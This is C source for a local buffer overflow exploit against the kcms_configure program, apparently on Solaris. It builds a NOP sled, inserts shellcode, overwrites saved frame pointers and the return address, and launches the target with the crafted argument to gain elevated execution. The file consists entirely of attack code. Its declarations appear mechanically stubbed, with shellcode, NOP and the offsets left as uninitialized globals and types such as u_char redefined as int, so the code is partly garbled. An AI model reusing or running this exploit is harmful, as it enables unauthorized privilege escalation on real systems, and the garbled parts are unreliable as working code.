
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_long ;
typedef int u_char ;


 int BIGBUF ;
 int* NOP ;
 int atoi (char*) ;
 int execl (char*,char*,char*,char*,char*,int*,int *) ;
 int exit (int ) ;
 int get_sp () ;
 int i7_OFFSET ;
 int l0_OFFSET ;
 int memcpy (int*,int*,int) ;
 int memset (int*,int,int ) ;
 int printf (char*,...) ;
 int puts (char*) ;
 int* shellcode ;
 int strcmp (char*,char*) ;
 int strlen (int*) ;
 int strtoul (char*,int *,int ) ;

int main(int argc, char **argv)
{
   u_char buf[BIGBUF+6];
   int i, offset;
   u_long addr;
   u_long paddr;

   if(argc > 1)
      if(!strcmp(argv[1], "-h") || !strcmp(argv[1], "--help"))
       {
         printf("%s [retaddr offset] [ptraddr]\n", argv[0]);
         exit(0);
       }
   addr = get_sp();
   if(argc > 1)
      offset = atoi(argv[1]);
   else
      offset = 3036;
   addr -= offset;

   if(argc > 2)
      paddr = strtoul(argv[2], ((void*)0), 0);
   else
      paddr = 0xffbeecf8;

   memset(buf, 255, BIGBUF);


   for(i = 1; i < 940 ; i+=4)
      memcpy(buf+i, NOP, 4);


   memcpy(buf+i, shellcode, strlen(shellcode));
   for(i=l0_OFFSET ; i < i7_OFFSET ; i+=4)
      memcpy(&buf[i], &paddr, 4);


   memcpy(&buf[i7_OFFSET], &addr, 4);


   buf[i7_OFFSET+4] = '\0';

   printf("ret address: 0x%x [%d]  ptr address: 0x%x  len: %d\n", addr, offset, paddr, strlen(buf));


   execl("/usr/X/bin/kcms_configure", "pine", "-o", "-S", "blah", buf, ((void*)0));


   puts("execl failed");
return 0;
}
